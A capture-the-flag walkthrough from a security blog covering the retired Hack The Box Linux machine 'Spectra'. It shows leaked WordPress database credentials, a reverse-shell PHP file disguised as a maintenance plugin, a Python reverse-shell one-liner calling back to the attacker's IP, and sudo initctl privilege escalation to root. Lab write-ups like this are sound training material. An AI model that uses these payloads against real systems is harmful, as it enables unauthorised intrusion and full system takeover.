Security Blog, Rants, Raves, Write-ups, and Code
Spectra
| Name: | Spectra 
|
|---|---|
| Release Date: | 27 Feb 2021 |
| Retire Date: | 25 Jun 2021 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
Westar  00 days, 00 hours, 18 mins, 24 seconds |
 |
Westar 00 days, 00 hours, 31 mins, 46 seconds |
| Creator: | egre55  |
| Pentest Workshop PDF: | Spectra.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.229
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
The main ports to worry about here are SSH TCP 22, HTTP TCP 80, and MySQL TCP 3306. Let's start by navigating to http://10.10.10.229 and we get a Issue Tracker (similar to Jira) that is in place "Until IT set up the Jira we can configure and use this for issue tracking."
Checking both links, while running Gobuster using:
gobuster dir -k -e -r -u http://10.10.10.229 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,301,302,307" -t50 -o Spectra.out
we notice that they are both going to spectra.htb. That means we need to add 10.10.10.229 spectra.htb to our /etc/hosts file using:
sudo vi /etc/hosts
i <to enter insert/edit mode>
10.10.10.229 spectra.htb
ESC
:wq!
ENTER
and try the navigation again. This time we are greeted by the correct pages, shown below, although the "Test" page throws a database error.
It looks like the Software Issue Management system is made in WordPress. Let's run Gobuster on the /main and /testing sites, but let's also run WPScan (a WordPress scanner) and see if anything pops up.
──(kali㉿kali)-[~/Desktop/HTB/Spectra]
└─$ gobuster dir -k -e -r -u http://10.10.10.229/main -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,
php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-main.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.229/main
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bat,inc,pcap,php.bak,pl,shtml,aspx,git,html,jsa,log,sh,swf,asp,bak,jhtml,mdb,php4,php7,cgi,htm,jsp,php6,phtml,php2,
php3,phps,sql,txt,xm,dll,exe,js,php5,c,cfm,css,com,nsf,php,pht,reg
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/01/24 01:30:14 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.10.229/main/: Get "http://10.10.10.229/main/": context deadline exceeded
(Client.Timeout exceeded while awaiting headers)
┌──(kali㉿kali)-[~/Desktop/HTB/Spectra]
└─$ gobuster dir -k -e -r -u http://10.10.10.229/testing -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,php4,
php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-testing.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.229/testing
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: shtml,sql,css,php3,php4,php6,php.bak,sh,nsf,php5,reg,swf,
bat,exe,php7,xm,log,php2,cfm,cgi,com,git,htm,jhtml,jsp,mdb,php,pht,c,jsa,phtml,
txt,asp,dll,html,js,pcap,phps,aspx,bak,inc,pl
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/01/24 01:30:57 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.229/testing/index.php (Status: 500) [Size: 2646]
http://10.10.10.229/testing/wp-content (Status: 200) [Size: 627]
http://10.10.10.229/testing/wp-login.php (Status: 500) [Size: 2646]
http://10.10.10.229/testing/license.txt (Status: 200) [Size: 19915]
http://10.10.10.229/testing/wp-includes (Status: 200) [Size: 25891]
http://10.10.10.229/testing/readme.html (Status: 200) [Size: 7278]
http://10.10.10.229/testing/wp-trackback.php (Status: 500) [Size: 2646]
http://10.10.10.229/testing/wp-admin (Status: 200) [Size: 11460]
http://10.10.10.229/testing/xmlrpc.php (Status: 200) [Size: 0]
http://10.10.10.229/testing/wp-signup.php (Status: 500) [Size: 2646]
Gobuster seems to stall and throw errors and WPScan provided no usable results, but it's clear we can list the /testing URL. However, that wp-config.php.save file looks interesting.
In the middle of all of that is a MySQL set of credentials.
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );
/** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
Going to the usual WordPress login (http://spectra.htb/main/wp-login.php), we can try using the MySQL credentials but with an Administrator username. With that, we have access to the WordPress Admin Portal!
A quick way to exploit WordPress is by uploading a malicious PHP Plugin page, usually in a ZIP format. The easiest and best way is to upload the php-reverse-shell.php from Pentest Monkey as the plugin, but we'll need the WP-Plugin headers added to it. Let's see if it works.
/* Plugin Name: WordPress Maintanance Plugin
Plugin URI: wordpress.org
Description: WordPress Maintenance Activities
Author: WordPress Version: 1.0
Author URI: wordpress.org
*/
Zip it, Upload it, Set a netcat listener on your chosen port, and Activate the Plugin. As soon as it is activated, we have a reverse shell as nginx!
Looking around the file system, we find some interesting things in the /opt folder. There is an "autologon.conf.orig" file with another path we need to look into:
nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do <<<<<<</etc/autologin is not normal
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
if [ -z "${passwd}" ]; then
exit 0
fi
# Inject keys into the login prompt.
#
# For this to work, you must have already created an account on the device.
# Otherwise, no login prompt appears at boot and the injected keys do the
# wrong thing.
/usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script
nginx@spectra /opt $ cat /etc/autologin/passwd
cat /etc/autologin/passwd
SummerHereWeCome!!
We know from the /home folder there are other users, so we try SSH as katie:SummerHereWeCome!! and we are able to log in.
Now we grab the user.txt flag and perform our usual enumerations. Sudo -l and finding "developers" group files shows us our exact privesc path.
We see SEVERAL test.conf files and a nodetest.js file. Looking into that NodeJS file, we need to change the node that runs the "exec" command to a python reverse shell callback. We can do that by commenting out the exec line and add our own.
exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR TUN0 IP>",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We have to act quickly because the test.conf file rewrites to the original pretty quickly.
Now we can run:
Attacking Machine:
nc -lvnp 1337
Victim Machine:
sudo /sbin/initctl start test
And we should get a reverse callback as Root!
# cat /root/root.txt
d44519713b889d5e1f9e536d0c6df2fc
VIDEO WALKTHROUGH
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.